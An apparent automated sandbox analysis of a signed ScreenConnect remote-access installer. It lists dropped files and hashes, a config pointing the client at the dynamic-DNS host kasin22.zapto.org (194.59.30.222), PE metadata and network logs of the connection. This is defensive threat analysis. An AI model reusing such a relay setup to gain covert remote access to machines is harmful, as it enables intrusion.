                                                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):562
                                                              Entropy (8bit):5.0370822274973674
                                                              Encrypted:false
                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOl7vHv/vXbAa3xT:2dL9hK6E46YPnj3vH
                                                              MD5:9DC890F3119C59826520AE6C4353CEB9
                                                              SHA1:136180B62BF59AB1BF4252A6F611D5B49AECC74B
                                                              SHA-256:3E84D1345BFA59463355896A87223040858420101C5E106D46ECDB9494581002
                                                              SHA-512:7332C009A749BDBEBFFBA4B23CEB91398B7775C4E9B9CC11DDEF47CAF09BCB8BA30F0B4B834DAC50F3FFC1859551CA2DECC07DD17F1BB88CA76E39DE6421B052
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kasin22.zapto.org=194.59.30.222-17%2f11%2f2024%2009%3a32%3a05</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):562
                                                              Entropy (8bit):5.0370822274973674
                                                              Encrypted:false
                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOl7vHv/vXbAa3xT:2dL9hK6E46YPnj3vH
                                                              MD5:9DC890F3119C59826520AE6C4353CEB9
                                                              SHA1:136180B62BF59AB1BF4252A6F611D5B49AECC74B
                                                              SHA-256:3E84D1345BFA59463355896A87223040858420101C5E106D46ECDB9494581002
                                                              SHA-512:7332C009A749BDBEBFFBA4B23CEB91398B7775C4E9B9CC11DDEF47CAF09BCB8BA30F0B4B834DAC50F3FFC1859551CA2DECC07DD17F1BB88CA76E39DE6421B052
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kasin22.zapto.org=194.59.30.222-17%2f11%2f2024%2009%3a32%3a05</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1590
                                                              Entropy (8bit):5.363907225770245
                                                              Encrypted:false
                                                              SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                              MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                              SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                              SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                              SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.423584461712653
                                                              Encrypted:false
                                                              SSDEEP:48:94RuVM+xFX4bT5hUWnd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Aduj4:uRU4TX9bpifTgHqdfqHgcNv9
                                                              MD5:2DBF69E169109AB1EDEB334BFF1DD060
                                                              SHA1:EB7FB2EE13805EA51BEF0E1B2BB5CD395818FAE1
                                                              SHA-256:AFA429E1286439EEE66A09AFFF240862F6BA103B06FE4F3B3CD8C8D7A8A61E62
                                                              SHA-512:03F7E27F892D542C3E827C0A6F4A9E27AD259A9BAF1BFED8507866A86CC8140F507916FF71D25FDF2E3C272D722AB26B4CEB0A04F3D1965A253B71C69E8F892C
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.423584461712653
                                                              Encrypted:false
                                                              SSDEEP:48:94RuVM+xFX4bT5hUWnd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Aduj4:uRU4TX9bpifTgHqdfqHgcNv9
                                                              MD5:2DBF69E169109AB1EDEB334BFF1DD060
                                                              SHA1:EB7FB2EE13805EA51BEF0E1B2BB5CD395818FAE1
                                                              SHA-256:AFA429E1286439EEE66A09AFFF240862F6BA103B06FE4F3B3CD8C8D7A8A61E62
                                                              SHA-512:03F7E27F892D542C3E827C0A6F4A9E27AD259A9BAF1BFED8507866A86CC8140F507916FF71D25FDF2E3C272D722AB26B4CEB0A04F3D1965A253B71C69E8F892C
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.8043005070624267
                                                              Encrypted:false
                                                              SSDEEP:48:j8PhpuRc06WX4EnT5/nd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Adu8:Khp10nTzbpifTgHqdfqHgcNv9
                                                              MD5:6ABD73E50893FAFFCA4C15B16748C1C0
                                                              SHA1:082ED09595D4569CF22FEC4FA1FF840F229149DC
                                                              SHA-256:4B3597871B4508D1F46A08FCA672E8938F3157A0CAFB89302E1FEE0325765F73
                                                              SHA-512:4F20EE3A9CE1B37E5C74797DF77DBCDAE24646D409B75A959060A2653223314C9D6C6799256D7F8FC3666712CB71F5D125547FD29AA8F5FCCC292DF7166793E5
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.8043005070624267
                                                              Encrypted:false
                                                              SSDEEP:48:j8PhpuRc06WX4EnT5/nd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Adu8:Khp10nTzbpifTgHqdfqHgcNv9
                                                              MD5:6ABD73E50893FAFFCA4C15B16748C1C0
                                                              SHA1:082ED09595D4569CF22FEC4FA1FF840F229149DC
                                                              SHA-256:4B3597871B4508D1F46A08FCA672E8938F3157A0CAFB89302E1FEE0325765F73
                                                              SHA-512:4F20EE3A9CE1B37E5C74797DF77DBCDAE24646D409B75A959060A2653223314C9D6C6799256D7F8FC3666712CB71F5D125547FD29AA8F5FCCC292DF7166793E5
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.423584461712653
                                                              Encrypted:false
                                                              SSDEEP:48:94RuVM+xFX4bT5hUWnd+qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+r2Aduj4:uRU4TX9bpifTgHqdfqHgcNv9
                                                              MD5:2DBF69E169109AB1EDEB334BFF1DD060
                                                              SHA1:EB7FB2EE13805EA51BEF0E1B2BB5CD395818FAE1
                                                              SHA-256:AFA429E1286439EEE66A09AFFF240862F6BA103B06FE4F3B3CD8C8D7A8A61E62
                                                              SHA-512:03F7E27F892D542C3E827C0A6F4A9E27AD259A9BAF1BFED8507866A86CC8140F507916FF71D25FDF2E3C272D722AB26B4CEB0A04F3D1965A253B71C69E8F892C
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):0.06891007709577635
                                                              Encrypted:false
                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOzVFepvJQGyVky6l3X:2F0i8n0itFzDHFz3eAE3X
                                                              MD5:85F03523CAB70D9637CEE3FC5FC8ECB1
                                                              SHA1:D1F8E44B9D260C11070BA2E9A39D2A7F590E5564
                                                              SHA-256:B8277C29C1E3C3C4C2D15019689D5981F0406EF7ADE641C690283CE910CE3E51
                                                              SHA-512:F7D90C4EBE84CD2A526923EE7C9442CBC847F8C7A287528F234A12F5E803DFD05F0930CE8527969050E6A2F5B07A9BAD6438CDB06908C8EEE471A10918F6397D
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):69632
                                                              Entropy (8bit):0.2363153163182469
                                                              Encrypted:false
                                                              SSDEEP:48:+UDBAdujS3qcq56AdujSifLgHW9dLDzV4xMygcuNoXSqfv+rMan:5xpifTgHqdfqHgcNv3
                                                              MD5:E4B00CBD93A896CD28D650014C8C8052
                                                              SHA1:2C8E503B43B26D19E43E59E394B06B98BF8AC273
                                                              SHA-256:A15516A2D3922418D88A0E69B8417FB073318916D2420E848E5FC58DE00656D4
                                                              SHA-512:3AC107E1E98E5F90F61B2C5EE24C249E83A237BF7F7383FBB5E9FFBB99370596752287C6CB36216593D6EBB70982DCFE6140943778E11731121606E6043CBC54
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.422858587192067
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:file.exe
                                                              File size:5'635'656 bytes
                                                              MD5:093b0062fbf8663736ced8f41859ff58
                                                              SHA1:20b26d4cc9e13c560bc1e86920f5965291cc4d7a
                                                              SHA256:64ca91a2446a8e567b24deea926bbdb34fd2dda221577787bbb62d07cbf0272d
                                                              SHA512:c23280c17f01b38975e6d5d5e0fcb618783535ec2f5fb11a7dcbfa662ef75fe41ac1653bf7ecb576763dbeee5f7d4ee0a18e9f4c6b761e976e6da30bda8c348f
                                                              SSDEEP:49152:jDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoO:R4s6efPQ53JLbd3LINMLaGUW39f0
                                                              TLSH:3546E111B3D995B9D0BF063CD87A52699A74BC048722C7AF57D4BD292D32BC04E323B6
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                              Icon Hash:00928e8e8686b000
                                                              Entrypoint:0x4014ad
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:1
                                                              File Version Major:5
                                                              File Version Minor:1
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:1
                                                              Import Hash:9771ee6344923fa220489ab01239bdfd
                                                              Signature Valid:true
                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                              Signature Validation Error:The operation completed successfully
                                                              Error Number:0
                                                              Not Before, Not After
                                                              • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                              Subject Chain
                                                              • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                              Version:3
                                                              Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                              Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                              Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                              Serial:0B9360051BCCF66642998998D5BA97CE
                                                              Instruction
                                                              call 00007F8E8CB883DAh
                                                              jmp 00007F8E8CB87E8Fh
                                                              push ebp
                                                              mov ebp, esp
                                                              push 00000000h
                                                              call dword ptr [0040D040h]
                                                              push dword ptr [ebp+08h]
                                                              call dword ptr [0040D03Ch]
                                                              push C0000409h
                                                              call dword ptr [0040D044h]
                                                              push eax
                                                              call dword ptr [0040D048h]
                                                              pop ebp
                                                              ret
                                                              push ebp
                                                              mov ebp, esp
                                                              sub esp, 00000324h
                                                              push 00000017h
                                                              call dword ptr [0040D04Ch]
                                                              test eax, eax
                                                              je 00007F8E8CB88017h
                                                              push 00000002h
                                                              pop ecx
                                                              int 29h
                                                              mov dword ptr [004148D8h], eax
                                                              mov dword ptr [004148D4h], ecx
                                                              mov dword ptr [004148D0h], edx
                                                              mov dword ptr [004148CCh], ebx
                                                              mov dword ptr [004148C8h], esi
                                                              mov dword ptr [004148C4h], edi
                                                              mov word ptr [004148F0h], ss
                                                              mov word ptr [004148E4h], cs
                                                              mov word ptr [004148C0h], ds
                                                              mov word ptr [004148BCh], es
                                                              mov word ptr [004148B8h], fs
                                                              mov word ptr [004148B4h], gs
                                                              pushfd
                                                              pop dword ptr [004148E8h]
                                                              mov eax, dword ptr [ebp+00h]
                                                              mov dword ptr [004148DCh], eax
                                                              mov eax, dword ptr [ebp+04h]
                                                              mov dword ptr [004148E0h], eax
                                                              lea eax, dword ptr [ebp+08h]
                                                              mov dword ptr [004148ECh], eax
                                                              mov eax, dword ptr [ebp-00000324h]
                                                              mov dword ptr [00414828h], 00010001h
                                                              Programming Language:
                                                              • [IMP] VS2008 SP1 build 30729
                                                              • [IMP] VS2008 build 21022
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533080.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x19c48
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x160000x5330800x5332000cb59c276652808eb7200fdad38bae5bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              FILES0x163d80x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.39622565881529853
                                                              FILES0x9c3d80x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111637115478516
                                                              FILES0x2409d80x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415614047897196
                                                              FILES0x25b5d80x2ec320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9812068939208984
                                                              FILES0x5478f80x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                              RT_MANIFEST0x548ef80x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                              DLLImport
                                                              mscoree.dllCorBindToRuntimeEx
                                                              KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                              OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 17, 2024 10:32:06.404378891 CET497148041192.168.2.6194.59.30.222
                                                              Nov 17, 2024 10:32:06.409332991 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:06.410316944 CET497148041192.168.2.6194.59.30.222
                                                              Nov 17, 2024 10:32:07.199896097 CET497148041192.168.2.6194.59.30.222
                                                              Nov 17, 2024 10:32:07.205755949 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:07.439279079 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:07.643366098 CET497148041192.168.2.6194.59.30.222
                                                              Nov 17, 2024 10:32:07.697129011 CET497148041192.168.2.6194.59.30.222
                                                              Nov 17, 2024 10:32:07.703073025 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:07.949614048 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:07.965214014 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:07.965274096 CET497148041192.168.2.6194.59.30.222
                                                              Nov 17, 2024 10:32:09.593555927 CET497148041192.168.2.6194.59.30.222
                                                              Nov 17, 2024 10:32:09.593605042 CET497148041192.168.2.6194.59.30.222
                                                              Nov 17, 2024 10:32:09.598721027 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:09.598753929 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:09.598846912 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:09.598865986 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:09.598886013 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:10.500570059 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:32:10.643399000 CET497148041192.168.2.6194.59.30.222
                                                              Nov 17, 2024 10:33:10.502857924 CET497148041192.168.2.6194.59.30.222
                                                              Nov 17, 2024 10:33:10.508097887 CET804149714194.59.30.222192.168.2.6
                                                              Nov 17, 2024 10:34:10.518495083 CET497148041192.168.2.6194.59.30.222
                                                              Nov 17, 2024 10:34:10.523865938 CET804149714194.59.30.222192.168.2.6
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 17, 2024 10:32:06.355391026 CET5276153192.168.2.61.1.1.1
                                                              Nov 17, 2024 10:32:06.363802910 CET53527611.1.1.1192.168.2.6
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Nov 17, 2024 10:32:06.355391026 CET192.168.2.61.1.1.10x76e3Standard query (0)kasin22.zapto.orgA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Nov 17, 2024 10:32:06.363802910 CET1.1.1.1192.168.2.60x76e3No error (0)kasin22.zapto.org194.59.30.222A (IP address)IN (0x0001)false

                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:04:31:59
                                                              Start date:17/11/2024
                                                              Path:C:\Users\user\Desktop\file.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\file.exe"
